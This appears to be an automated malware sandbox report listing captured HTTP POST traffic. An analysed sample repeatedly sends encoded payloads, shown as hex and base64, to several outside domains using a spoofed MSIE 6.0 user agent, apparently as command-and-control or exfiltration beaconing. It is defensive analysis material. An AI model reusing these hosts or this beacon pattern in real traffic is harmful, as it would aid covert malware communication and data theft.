7a 75 74 44 7a 33 66 48 44 4f 6d 73 76 48 32 37 71 55 79 34 37 73 4e 61 72 2f 43 4c 58 7a 63 59 73 65 67 50 65 77 38 78 36 41 35 69 64 5a 6d 30 73 30 6e 5a 42 59 65 66 79 51 33 4f 75 59 45 64 77 71 52 52 39 5a 37 37 6f 65 36 33 4f 42 6d 43 72 45 68 52 4a 72 42 67 54 31 2f 36 46 7a 33 39 73 51 6a 49 75 6d 52 4e 6b 7a 56 6a 69 6d 2b 58 68 49 62 5a 48 71 2f 4d 6a 70 53 65 61 7a 2b 69 74 55 6d 4c 64 4f 73 46 73 6b 34 79 39 48 48 32 4e 46 66 63 57 79 66 35 35 33 62 71 5a 2b 7a 74 4e 72 2f 68 4c 2f 6e 6d 70 52 4d 69 34 41 63 6b 6e 32 37 36 33 6f 5a 75 6e 46 75 6f 52 59 79 77 35 50 55 2f 33 58 50 56 2b 74 33 78 33 65 2f 49 48 4b 30 56 79 53 5a 38 73 4e 62 66 51 66 57 58 55 54 30 42 78 4f 74 79 44 4e 69 73 45 79 77 68 48 31 2b 70 73 32 76 64 33 75 6d 46 4b 6d 75 70 43 77 59 79 75 39 4c 67 77 71 51 76 30 33 6c 2b 6d 72 5a 4e 67 34 63 41 64 58 6d 4a 33 65 4d 6f 63 56 57 76 31 31 44 71 55 67 7a 53 61 6a 51 75 70 68 79 52 6b 5a 63 31 4f 65 6e 62 46 71 37 35 79 66 4f 41 58 38 78 70 2b 45 64 42 51 30 36 55 78 31 62 4a 74 6c 34 7a 38 68 64 30 46 65 44 5a 63 52 7a 4b 69 56 4a 69 43 6c 33 77 56 75 57 33 50 67 4b 5a 52 53 67 35 74 55 64 30 79 57 47 33 6d 78 4f 72 6a 4a 48 43 61 54 69 49 5a 2b 71 37 6a 4e 48 6c 38 41 71 77 4b 32 55 4c 7a 6b 32 4d 54 4c 76 79 2f 67 42 48 6b 70 66 62 66 30 68 49 4e 4f 4a 37 5a 71 73 56 31 4d 32 65 61 6d 46 47 37 2b 36 78 41 57 4e 63 66 76 7a 53 76 59 56 37 74 61 65 6e 73 73 3d Data Ascii: Q/BFFOMrvJRTGOByap+kDAy09hUJCMRtx6dzbroGtJhwRIZk/Il+EZHpndVjkniorVkB9A4eKEm9Ih5gCEHTLlHIFWqfde7XbEhitsQa1F3EhikkflixH5zp3NNQ8zutDz3fHDOmsvH27qUy47sNar/CLXzcYsegPew8x6A5idZm0s0nZBYefyQ3OuYEdwqRR9Z77oe63OBmCrEhRJrBgT1/6Fz39sQjIumRNkzVjim+XhIbZHq/MjpSeaz+itUmLdOsFsk4y9HH2NFfcWyf553bqZ+ztNr/hL/nmpRMi4Ackn2763oZunFuoRYyw5PU/3XPV+t3x3e/IHK0VySZ8sNbfQfWXUT0BxOtyDNisEywhH1+ps2vd3umFKmupCwYyu9LgwqQv03l+mrZNg4cAdXmJ3eMocVWv11DqUgzSajQuphyRkZc1OenbFq75yfOAX8xp+EdBQ06Ux1bJtl4z8hd0FeDZcRzKiVJiCl3wVuW3PgKZRSg5tUd0yWG3mxOrjJHCaTiIZ+q7jNHl8AqwK2ULzk2MTLvy/gBHkpfbf0hINOJ7ZqsV1M2eamFG7+6xAWNcfvzSvYV7taenss=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 58 41 63 72 41 51 2b 4e 75 35 54 5a 33 36 43 30 72 68 65 67 53 68 69 75 47 52 4b 6c 7a 72 38 77 73 32 57 54 57 48 55 66 36 35 47 49 54 61 45 45 55 44 4e 67 33 4d 6f 6e 74 34 75 49 59 4a 57 4b 76 51 48 4c 58 52 4a 33 32 6a 71 50 46 45 67 77 50 67 42 34 53 67 43 4a 52 35 78 47 78 73 46 38 4b 44 70 57 62 6e 6a 31 63 4f 4b 2b 55 6e 4e 53 53 4a 4c 52 4b 30 65 42 7a 49 76 78 53 53 4b 59 75 6e 6e 4c 50 38 62 5a 6c 39 54 55 76 61 39 65 38 79 66 44 77 6f 34 39 44 6c 72 2f 65 52 51 69 5a 5a 67 6d 43 46 71 70 79 42 61 68 4a 51 31 58 4d 69 75 51 57 57 45 6c 79 54 77 6f 66 46 4a 36 58 63 34 32 34 61 4d 39 63 64 6b 43 44 58 76 63 2f 71 4e 34 6f 2f 4f 2b 58 6a 5a 69 48 42 6f 34 54 69 50 2f 4a 61 77 6b 68 55 4d 73 6f 6b 30 63 50 42 50 53 39 45 67 33 30 50 42 45 64 4b 51 31 45 6d 68 35 48 73 6e 69 75 58 69 6c 50 57 44 5a 42 4b 48 50 56 63 79 5a 33 64 2b 2f 65 35 33 48 68 65 69 47 67 46 36 2b 54 67 61 6b 4e 77 6f 62 67 58 33 61 42 53 64 69 67 59 46 53 54 37 42 53 55 52 57 69 33 79 41 56 62 4c 4a 35 78 6d 47 73 6c 73 44 66 41 76 46 32 63 52 52 6a 42 51 66 4e 70 50 47 6d 2b 4f 6f 76 2f 46 49 67 71 33 46 51 79 5a 73 68 59 58 57 34 56 72 66 6d 6d 54 74 57 74 69 4d 6c 63 50 57 70 45 66 53 72 61 4e 67 74 32 78 41 4f 55 78 4b 70 76 41 43 51 49 6d 72 4b 77 43 46 56 59 62 57 73 5a 4e 41 61 6f 76 6d 36 6b 63 76 6c 6d 65 34 47 37 67 43 4d 36 6e 6b 69 44 53 41 74 48 4c 78 64 6c 42 53 61 56 5a 2f 61 4c 63 55 4d 35 58 6c 33 4b 49 31 52 49 37 5a 43 4f 4b 72 63 32 72 37 4b 2b 78 59 65 6b 58 72 49 68 51 61 59 73 46 4a 47 4e 6f 32 76 6c 6f 37 71 79 31 54 35 4a 58 68 6f 63 6b 67 2f 65 42 46 32 50 51 6b 74 39 74 38 48 75 77 4c 59 Data Ascii: XAcrAQ+Nu5TZ36C0rhegShiuGRKlzr8ws2WTWHUf65GITaEEUDNg3Mont4uIYJWKvQHLXRJ32jqPFEgwPgB4SgCJR5xGxsF8KDpWbnj1cOK+UnNSSJLRK0eBzIvxSSKYunnLP8bZl9TUva9e8yfDwo49Dlr/eRQiZZgmCFqpyBahJQ1XMiuQWWElyTwofFJ6Xc424aM9cdkCDXvc/qN4o/O+XjZiHBo4TiP/JawkhUMsok0cPBPS9Eg30PBEdKQ1Emh5HsniuXilPWDZBKHPVcyZ3d+/e53HheiGgF6+TgakNwobgX3aBSdigYFST7BSURWi3yAVbLJ5xmGslsDfAvF2cRRjBQfNpPGm+Oov/FIgq3FQyZshYXW4VrfmmTtWtiMlcPWpEfSraNgt2xAOUxKpvACQImrKwCFVYbWsZNAaovm6kcvlme4G7gCM6nkiDSAtHLxdlBSaVZ/aLcUM5Xl3KI1RI7ZCOKrc2r7K+xYekXrIhQaYsFJGNo2vlo7qy1T5JXhockg/eBF2PQkt9t8HuwLY
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 47 63 48 31 37 57 7a 74 75 70 51 70 79 77 34 4d 56 77 6b 53 64 48 2b 33 71 55 66 45 4e 71 73 33 59 4f 55 69 6d 52 41 55 6f 32 6e 66 62 33 67 43 6a 73 37 44 47 4e 66 6c 6f 38 45 55 5a 4a 79 6c 48 66 49 72 69 33 71 75 58 41 50 4f 75 6c 70 55 48 50 45 4c 39 38 6c 68 37 63 53 34 72 37 45 50 45 33 64 46 69 61 61 39 36 6a 43 74 6a 2f 58 4f 47 50 4d 75 39 55 41 59 57 31 72 73 6e 4a 49 70 6b 78 39 6b 71 67 6e 77 4a 7a 52 41 46 6a 59 7a 7a 63 69 75 71 77 35 6f 76 69 72 78 4b 76 38 38 44 31 50 61 33 38 58 65 65 77 48 54 73 74 63 61 6c 51 4c 47 67 48 7a 47 35 34 31 53 49 6d 77 6a 58 78 4c 79 6c 48 6b 4a 53 72 34 4a 62 76 65 37 30 65 65 2b 54 66 5a 77 50 68 68 73 75 68 33 58 47 6b 68 33 71 2f 65 45 4a 64 39 54 41 78 52 52 46 47 61 46 34 64 54 2f 6d 45 35 64 65 48 4a 46 57 6f 43 53 6f 48 48 43 30 5a 6c 6e 71 62 36 37 49 58 76 75 37 53 4d 53 4f 62 6e 6a 66 76 47 34 55 31 56 35 77 54 42 73 47 6d 4a 4e 54 2b 69 74 2f 59 72 52 6a 2f 32 4e 47 4d 34 31 4a 31 74 4d 73 7a 76 4b 58 68 46 6f 73 69 54 44 46 48 75 75 63 63 5a 75 65 4a 70 6a 66 64 45 72 2b 44 2b 74 57 44 74 65 35 4f 65 63 35 4d 47 55 49 49 32 48 53 67 63 46 64 48 49 2f 7a 2f 4d 73 74 42 6e 77 4f 71 42 4d 64 66 30 65 6b 6a 6a 58 42 67 5a 39 77 62 48 4c 76 6c 55 42 43 34 61 67 6f 36 65 2f 7a 4e 72 4e 4b 4b 4a 31 38 55 6b 39 34 70 58 55 56 63 70 71 31 31 68 2f 71 6d 46 36 72 45 62 53 4f 49 67 6b 73 2f 62 49 6d 38 34 52 52 58 30 6d 39 43 5a 4c 46 67 52 45 6c 54 46 52 2f 4d 4e 4a 4b 4f 30 6e 35 68 6a 62 78 66 64 4f 49 6f 63 50 2f 79 48 48 47 76 32 46 49 36 72 6c 59 4c 77 63 55 50 2b 37 64 6b 6e 45 6d 33 7a 57 56 33 36 6c 30 79 54 32 31 30 4a 43 5a 62 46 77 47 52 31 45 38 78 4a 49 58 74 7a 6f 46 62 37 6a 73 77 3d 3d Data Ascii: GcH17WztupQpyw4MVwkSdH+3qUfENqs3YOUimRAUo2nfb3gCjs7DGNflo8EUZJylHfIri3quXAPOulpUHPEL98lh7cS4r7EPE3dFiaa96jCtj/XOGPMu9UAYW1rsnJIpkx9kqgnwJzRAFjYzzciuqw5ovirxKv88D1Pa38XeewHTstcalQLGgHzG541SImwjXxLylHkJSr4Jbve70ee+TfZwPhhsuh3XGkh3q/eEJd9TAxRRFGaF4dT/mE5deHJFWoCSoHHC0Zlnqb67IXvu7SMSObnjfvG4U1V5wTBsGmJNT+it/YrRj/2NGM41J1tMszvKXhFosiTDFHuuccZueJpjfdEr+D+tWDte5Oec5MGUII2HSgcFdHI/z/MstBnwOqBMdf0ekjjXBgZ9wbHLvlUBC4ago6e/zNrNKKJ18Uk94pXUVcpq11h/qmF6rEbSOIgks/bIm84RRX0m9CZLFgRElTFR/MNJKO0n5hjbxfdOIocP/yHHGv2FI6rlYLwcUP+7dknEm3zWV36l0yT210JCZbFwGR1E8xJIXtzoFb7jsw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 75 4e 2f 55 64 4b 52 4f 76 35 51 4f 49 31 36 68 50 30 6c 2f 73 58 63 42 76 69 6c 63 54 50 78 6d 47 48 37 4f 65 73 31 2b 2f 77 69 6a 6f 4d 6c 48 79 47 42 46 48 55 58 44 48 48 57 4a 42 6f 49 63 35 67 68 76 33 51 6d 6b 47 34 6b 2b 50 61 54 52 54 46 35 61 69 78 74 38 2f 4a 73 4c 73 63 2f 41 69 48 38 63 6d 77 2f 68 43 73 67 45 57 61 47 4c 33 39 44 57 58 52 48 6f 61 73 69 54 61 6f 73 74 6f 66 56 49 79 4a 45 69 48 49 6c 34 52 52 68 73 67 71 61 37 41 67 57 42 6d 65 74 6a 74 68 41 53 6d 75 71 45 47 6a 39 66 4a 37 5a 6d 32 70 34 38 57 41 30 32 73 78 56 2b 79 72 59 4d 63 46 74 77 73 4a 4b 66 69 4f 76 59 44 5a 68 77 4a 30 4e 4c 74 54 55 44 47 59 4c 58 34 50 72 5a 54 68 45 77 63 49 4c 4c 41 67 62 6e 2f 6d 67 58 46 6e 2f 76 34 48 45 35 42 35 53 51 7a 31 6b 39 48 6d 6a 55 44 45 70 73 52 52 6e 31 47 6a 48 4f 79 6f 5a 53 50 34 6c 69 6f 65 46 61 49 51 76 75 4c 46 2b 4a 34 79 59 2f 78 38 72 71 48 57 49 71 6e 38 4d 2b 6b 4f 49 78 79 62 36 4a 63 54 6d 52 4f 33 6f 45 70 6a 4c 54 47 36 2b 75 53 50 57 2b 74 4a 6a 41 4a 35 58 43 33 7a 68 77 48 65 6b 5a 4c 36 72 64 67 38 4f 59 44 41 51 52 42 56 31 74 64 76 54 41 73 55 2b 78 2f 4e 45 48 59 33 34 72 4b 38 38 38 46 32 68 45 7a 74 59 62 30 43 35 37 46 77 76 4d 48 4b 65 44 44 58 64 75 30 62 67 6e 43 48 72 64 53 55 2f 49 68 7a 65 6a 2b 4e 2b 56 76 4d 4e 30 6f 76 30 4c 51 76 2b 66 68 4a 43 35 67 43 58 75 71 66 45 76 68 52 72 38 68 78 58 61 45 47 6b 72 33 58 66 4f 58 75 44 34 47 7a 72 30 4b 4c 52 57 71 64 6a 68 64 64 4c 55 33 2b 2f 70 6b 31 41 4e 48 64 56 38 69 6e 56 58 34 6a 58 43 72 2f 33 64 4f 75 67 63 43 50 53 57 62 7a 51 2b 62 4c 59 6e 42 35 6a 68 31 52 6a 46 78 57 4e 4f 4b 7a 43 79 48 4a 66 51 77 54 79 4f 58 51 51 4e 59 45 77 50 69 49 52 67 79 4f 37 33 Data Ascii: uN/UdKROv5QOI16hP0l/sXcBvilcTPxmGH7Oes1+/wijoMlHyGBFHUXDHHWJBoIc5ghv3QmkG4k+PaTRTF5aixt8/JsLsc/AiH8cmw/hCsgEWaGL39DWXRHoasiTaostofVIyJEiHIl4RRhsgqa7AgWBmetjthASmuqEGj9fJ7Zm2p48WA02sxV+yrYMcFtwsJKfiOvYDZhwJ0NLtTUDGYLX4PrZThEwcILLAgbn/mgXFn/v4HE5B5SQz1k9HmjUDEpsRRn1GjHOyoZSP4lioeFaIQvuLF+J4yY/x8rqHWIqn8M+kOIxyb6JcTmRO3oEpjLTG6+uSPW+tJjAJ5XC3zhwHekZL6rdg8OYDAQRBV1tdvTAsU+x/NEHY34rK888F2hEztYb0C57FwvMHKeDDXdu0bgnCHrdSU/Ihzej+N+VvMN0ov0LQv+fhJC5gCXuqfEvhRr8hxXaEGkr3XfOXuD4Gzr0KLRWqdjhddLU3+/pk1ANHdV8inVX4jXCr/3dOugcCPSWbzQ+bLYnB5jh1RjFxWNOKzCyHJfQwTyOXQQNYEwPiIRgyO73
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 58 41 63 72 41 51 2b 4e 75 35 54 5a 33 36 43 30 72 68 65 67 53 68 69 75 47 52 4b 6c 7a 72 38 77 73 32 57 54 57 48 55 66 36 35 47 49 54 61 45 45 55 44 4e 67 33 4d 6f 6e 74 34 75 49 59 4a 57 4b 76 51 48 4c 58 52 4a 33 32 6a 71 50 46 45 67 77 50 67 42 34 53 67 43 4a 52 35 78 47 78 73 46 38 4b 44 70 57 62 6e 6a 31 63 4f 4b 2b 55 6e 4e 53 53 4a 4c 52 4b 30 65 42 7a 49 76 78 53 53 4b 59 75 6e 6e 4c 50 38 62 5a 6c 39 54 55 76 61 39 65 38 79 66 44 77 6f 34 39 44 6c 72 2f 65 52 51 69 5a 5a 67 6d 43 46 71 70 79 42 61 68 4a 51 31 58 4d 69 75 51 57 57 45 6c 79 54 77 6f 66 46 4a 36 58 63 34 32 34 61 4d 39 63 64 6b 43 44 58 76 63 2f 71 4e 34 6f 2f 4f 2b 58 6a 5a 69 48 42 6f 34 54 69 50 2f 4a 61 77 6b 68 55 4d 73 6f 6b 30 63 50 42 50 53 39 45 67 33 30 50 42 45 64 4b 51 31 45 6d 68 35 48 73 6e 69 75 58 69 6c 50 57 44 5a 42 4b 48 50 56 63 79 5a 33 64 2b 2f 65 35 33 48 68 65 69 47 67 46 36 2b 54 67 61 6b 4e 77 6f 62 67 58 33 61 42 53 64 69 67 59 46 53 54 37 42 53 55 52 57 69 33 79 41 56 62 4c 4a 35 78 6d 47 73 6c 73 44 66 41 76 46 32 63 52 52 6a 42 51 66 4e 70 50 47 6d 2b 4f 6f 76 2f 46 49 67 71 33 46 51 79 5a 73 68 59 58 57 34 56 72 66 6d 6d 54 74 57 74 69 4d 6c 63 50 57 70 45 66 53 72 61 4e 67 74 32 78 41 4f 55 78 4b 70 76 41 43 51 49 6d 72 4b 77 43 46 56 59 62 57 73 5a 4e 41 61 6f 76 6d 36 6b 63 76 6c 6d 65 34 47 37 67 43 4d 36 6e 6b 69 44 53 41 74 48 4c 78 64 6c 42 53 61 56 5a 2f 61 4c 63 55 4d 35 58 6c 33 4b 49 31 52 49 37 5a 43 4f 4b 72 63 32 72 37 4b 2b 78 59 65 6b 58 72 49 68 51 61 59 73 46 4a 47 4e 6f 32 76 6c 6f 37 71 79 31 54 35 4a 58 68 6f 63 6b 67 2f 65 42 46 32 50 51 6b 74 39 74 38 48 75 77 4c 59 Data Ascii: XAcrAQ+Nu5TZ36C0rhegShiuGRKlzr8ws2WTWHUf65GITaEEUDNg3Mont4uIYJWKvQHLXRJ32jqPFEgwPgB4SgCJR5xGxsF8KDpWbnj1cOK+UnNSSJLRK0eBzIvxSSKYunnLP8bZl9TUva9e8yfDwo49Dlr/eRQiZZgmCFqpyBahJQ1XMiuQWWElyTwofFJ6Xc424aM9cdkCDXvc/qN4o/O+XjZiHBo4TiP/JawkhUMsok0cPBPS9Eg30PBEdKQ1Emh5HsniuXilPWDZBKHPVcyZ3d+/e53HheiGgF6+TgakNwobgX3aBSdigYFST7BSURWi3yAVbLJ5xmGslsDfAvF2cRRjBQfNpPGm+Oov/FIgq3FQyZshYXW4VrfmmTtWtiMlcPWpEfSraNgt2xAOUxKpvACQImrKwCFVYbWsZNAaovm6kcvlme4G7gCM6nkiDSAtHLxdlBSaVZ/aLcUM5Xl3KI1RI7ZCOKrc2r7K+xYekXrIhQaYsFJGNo2vlo7qy1T5JXhockg/eBF2PQkt9t8HuwLY
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 4f 36 63 69 52 42 62 4a 70 4a 54 46 6a 33 65 47 38 65 30 52 46 4c 6e 53 4c 4a 65 32 74 4e 59 6d 71 72 59 6f 58 38 43 6b 54 31 7a 66 49 4a 45 4f 34 51 58 73 63 38 52 79 59 2b 6a 4c 71 52 36 6f 35 64 54 76 4f 6c 53 6d 56 67 69 2f 6e 59 35 50 66 56 56 43 58 74 5a 53 72 71 4d 37 59 57 6a 45 74 41 70 4b 76 6d 4c 5a 6c 46 30 75 55 42 66 6e 78 4b 4e 62 50 50 79 48 4e 71 65 30 52 49 78 44 2f 37 75 2b 62 74 6a 78 61 78 6c 71 33 6a 4f 6c 37 55 37 77 2b 6d 31 77 71 4a 4c 34 64 46 51 79 4d 43 37 32 45 78 62 56 49 4b 61 32 71 55 4e 52 67 6e 54 6e 63 34 52 4e 4e 50 34 39 33 61 47 77 6c 4a 53 62 63 69 50 35 35 31 57 52 34 54 53 56 47 52 31 51 55 2f 44 69 54 69 31 48 37 5a 63 4b 67 43 72 67 6c 37 39 4b 53 78 48 43 41 30 78 63 69 7a 53 59 6e 6f 64 43 5a 72 62 42 75 6b 6d 32 31 38 71 66 2b 51 70 4d 6c 75 30 4d 76 64 7a 35 6e 55 74 54 4c 55 43 68 6c 69 44 6c 71 2b 75 67 76 35 44 67 72 38 79 43 72 4a 42 6c 33 59 6d 6b 73 79 45 72 74 38 79 37 4c 5a 55 64 43 53 37 6c 67 74 43 50 34 6d 61 49 69 56 38 56 67 32 53 31 42 6c 37 42 43 61 37 76 63 78 59 39 63 56 33 76 66 4d 46 77 35 68 46 70 53 42 50 2f 59 64 4b 53 77 46 72 4b 6d 50 39 70 4d 4f 56 54 72 2f 69 53 5a 67 47 6e 54 61 63 39 49 68 52 32 4a 6f 43 4e 31 30 2f 33 76 57 36 57 73 44 52 55 32 46 30 35 70 57 50 79 59 30 68 4b 53 73 56 56 70 6e 67 34 59 4f 64 37 54 74 56 51 6c 48 63 67 6c 70 4b 41 62 71 51 32 4a 4b 65 6b 58 38 33 68 79 51 4f 57 56 31 30 32 6a 51 64 4b 46 76 47 45 35 68 4b 46 6e 79 34 34 77 51 55 6f 6a 39 74 4a 44 79 34 33 70 6b 4c 55 50 42 6b 77 6b 4d 36 76 76 44 77 6b 63 2b 6f 4f 49 42 56 30 78 32 59 52 31 4c 56 6e 44 6d 61 6a 79 33 79 71 69 69 4e 52 6f 54 6a 64 5a 78 68 43 4f 69 44 66 38 54 43 4e 36 4b 79 47 52 33 54 4b 33 52 52 31 57 4d 70 59 69 74 30 70 37 76 5a 6d 55 56 59 35 71 2f 2b 38 Data Ascii: O6ciRBbJpJTFj3eG8e0RFLnSLJe2tNYmqrYoX8CkT1zfIJEO4QXsc8RyY+jLqR6o5dTvOlSmVgi/nY5PfVVCXtZSrqM7YWjEtApKvmLZlF0uUBfnxKNbPPyHNqe0RIxD/7u+btjxaxlq3jOl7U7w+m1wqJL4dFQyMC72ExbVIKa2qUNRgnTnc4RNNP493aGwlJSbciP551WR4TSVGR1QU/DiTi1H7ZcKgCrgl79KSxHCA0xcizSYnodCZrbBukm218qf+QpMlu0Mvdz5nUtTLUChliDlq+ugv5Dgr8yCrJBl3YmksyErt8y7LZUdCS7lgtCP4maIiV8Vg2S1Bl7BCa7vcxY9cV3vfMFw5hFpSBP/YdKSwFrKmP9pMOVTr/iSZgGnTac9IhR2JoCN10/3vW6WsDRU2F05pWPyY0hKSsVVpng4YOd7TtVQlHcglpKAbqQ2JKekX83hyQOWV102jQdKFvGE5hKFny44wQUoj9tJDy43pkLUPBkwkM6vvDwkc+oOIBV0x2YR1LVnDmajy3yqiiNRoTjdZxhCOiDf8TCN6KyGR3TK3RR1WMpYit0p7vZmUVY5q/+8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwk; _mcnc=1Data Raw: 58 2b 69 73 50 30 69 7a 69 35 53 69 71 43 4f 2b 69 37 37 39 38 72 74 68 74 7a 76 51 64 36 55 54 2f 48 4c 6e 49 63 7a 67 4c 66 32 7a 31 42 4c 61 47 6d 73 34 48 48 50 78 6c 6c 58 31 46 69 2b 77 75 79 73 2b 59 5a 69 39 49 64 52 79 69 68 5a 47 4e 73 6c 6f 44 7a 67 63 7a 58 6f 32 70 47 37 45 79 74 56 50 57 32 67 62 4e 6c 66 39 6f 4d 73 30 55 6b 37 50 77 37 6d 68 4d 75 6e 63 2f 45 4c 44 55 6a 7a 79 48 76 67 43 6b 6d 32 75 49 53 55 76 4b 30 4b 75 65 50 39 34 68 2b 6a 78 39 4b 4a 67 4a 30 56 63 6c 7a 5a 59 32 35 73 2b 2b 6e 62 44 65 46 54 37 79 53 57 77 65 4f 39 47 52 6c 78 31 69 65 7a 65 30 51 70 52 4b 33 66 79 54 2f 6f 53 67 49 34 34 2b 32 6e 48 67 4c 47 44 48 47 6c 38 31 74 68 55 79 31 73 71 71 31 58 58 69 52 6d 49 55 34 4d 34 64 48 43 7a 5a 37 2b 4a 4f 68 46 4d 2f 71 74 50 2f 72 6c 69 58 50 47 63 52 62 61 6c 55 39 30 4b 78 37 66 71 6b 6e 33 32 6a 51 43 41 6b 32 75 6c 37 39 68 76 46 61 56 52 41 4c 64 35 41 32 61 51 6f 45 37 4e 2f 45 44 6a 4c 36 79 68 35 51 54 36 6c 5a 56 47 6d 62 77 4a 76 4e 67 62 59 4f 53 64 2b 68 75 7a 58 69 4f 59 68 69 61 6f 4e 74 72 6c 38 61 33 52 68 49 39 77 4c 4f 33 61 47 33 46 66 79 61 61 70 38 41 77 58 7a 31 6c 50 48 6a 67 61 5a 59 72 74 41 46 39 68 62 6d 50 4a 74 4e 44 72 4e 47 62 70 57 30 43 62 67 52 67 33 2b 67 61 58 6e 42 76 75 74 57 2b 46 79 39 57 42 42 68 30 47 56 42 79 47 77 56 4d 61 30 32 33 4d 78 31 39 55 79 30 57 6f 33 62 78 4e 52 53 65 74 38 63 6a 30 4b 53 4c 69 50 39 44 49 4c 53 31 72 57 39 41 55 64 38 44 76 39 57 72 4b 34 2f 43 63 65 2b 69 4c 76 70 2b 32 64 37 69 67 31 79 57 76 39 45 64 62 6c 43 46 6c 46 77 55 79 50 76 6e 6e 4f 76 6e 45 77 65 66 65 78 46 77 3d Data Ascii: X+isP0izi5SiqCO+i7798rthtzvQd6UT/HLnIczgLf2z1BLaGms4HHPxllX1Fi+wuys+YZi9IdRyihZGNsloDzgczXo2pG7EytVPW2gbNlf9oMs0Uk7Pw7mhMunc/ELDUjzyHvgCkm2uISUvK0KueP94h+jx9KJgJ0VclzZY25s++nbDeFT7ySWweO9GRlx1ieze0QpRK3fyT/oSgI44+2nHgLGDHGl81thUy1sqq1XXiRmIU4M4dHCzZ7+JOhFM/qtP/rliXPGcRbalU90Kx7fqkn32jQCAk2ul79hvFaVRALd5A2aQoE7N/EDjL6yh5QT6lZVGmbwJvNgbYOSd+huzXiOYhiaoNtrl8a3RhI9wLO3aG3Ffyaap8AwXz1lPHjgaZYrtAF9hbmPJtNDrNGbpW0CbgRg3+gaXnBvutW+Fy9WBBh0GVByGwVMa023Mx19Uy0Wo3bxNRSet8cj0KSLiP9DILS1rW9AUd8Dv9WrK4/Cce+iLvp+2d7ig1yWv9EdblCFlFwUyPvnnOvnEwefexFw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 76 74 6f 34 44 50 62 6f 75 35 53 33 76 6d 4f 57 55 63 76 52 61 4a 6c 5a 35 51 34 57 51 6d 74 53 69 75 54 6b 4f 6c 4c 2f 4e 41 6d 6a 75 49 53 2f 5a 77 44 4d 4f 67 76 49 32 69 70 64 36 59 73 66 33 36 55 49 34 74 42 30 2f 78 67 72 50 4d 55 53 61 79 39 6f 41 2b 6a 56 35 5a 4a 33 64 67 46 4b 33 6e 33 42 38 6b 42 67 31 49 7a 4e 76 69 6e 54 4e 4a 6a 4a 34 6a 4f 30 46 62 59 33 45 4f 34 64 48 46 48 35 79 6d 4c 64 38 32 74 6c 64 34 64 31 4c 4c 55 38 70 44 6f 7a 2f 4b 74 50 76 70 55 41 76 69 4d 6f 4d 59 39 43 4d 6f 74 77 79 41 59 78 6f 44 33 52 4b 4f 68 6c 6e 2f 52 56 32 58 4e 65 55 62 38 71 7a 66 5a 5a 30 76 59 34 5a 66 77 64 75 34 2b 71 63 7a 7a 35 2f 54 6f 4e 6b 5a 2f 67 44 65 2f 55 75 64 49 56 42 56 6b 48 7a 37 33 69 77 59 33 74 4b 30 75 64 30 53 57 56 34 4c 62 56 41 4c 4e 41 31 73 4a 4b 65 73 6b 32 50 67 51 6e 70 43 65 6c 35 43 61 73 46 33 67 48 47 53 37 67 6b 4b 6d 51 70 34 64 42 75 66 6b 61 59 34 49 38 2b 34 56 6e 67 52 4e 75 75 30 68 49 6c 38 4a 50 6b 4b 79 35 51 36 45 44 53 4d 61 39 6e 55 50 74 50 31 65 69 78 50 6a 72 75 4d 6c 47 67 42 49 57 43 35 79 48 57 43 45 53 31 41 77 78 48 4f 32 51 53 57 51 61 57 2b 39 79 61 78 47 6d 6b 50 38 67 59 73 43 79 4e 69 64 61 76 49 74 4b 6f 5a 35 68 6c 72 70 50 7a 64 4b 78 58 39 7a 69 4d 6d 57 2f 74 73 4f 6d 6b 62 74 6c 6f 56 67 6e 5a 65 43 74 65 4b 4d 58 69 52 51 70 37 50 2f 38 79 74 53 64 36 32 46 5a 73 70 52 33 62 37 49 71 69 2b 34 43 56 2f 48 6a 59 74 45 32 72 6e 38 6b 54 35 6b 35 2b 47 5a 50 54 4f 6b 56 62 57 6d 2b 50 62 78 36 73 52 6e 73 33 56 78 36 48 61 72 38 43 58 73 35 54 68 62 31 35 78 62 6a 39 68 41 4d 2b 79 7a 62 4f 36 79 65 79 69 67 4a 65 43 44 49 46 51 45 77 6e 68 38 73 58 5a 5a 72 4f 4f 34 3d Data Ascii: 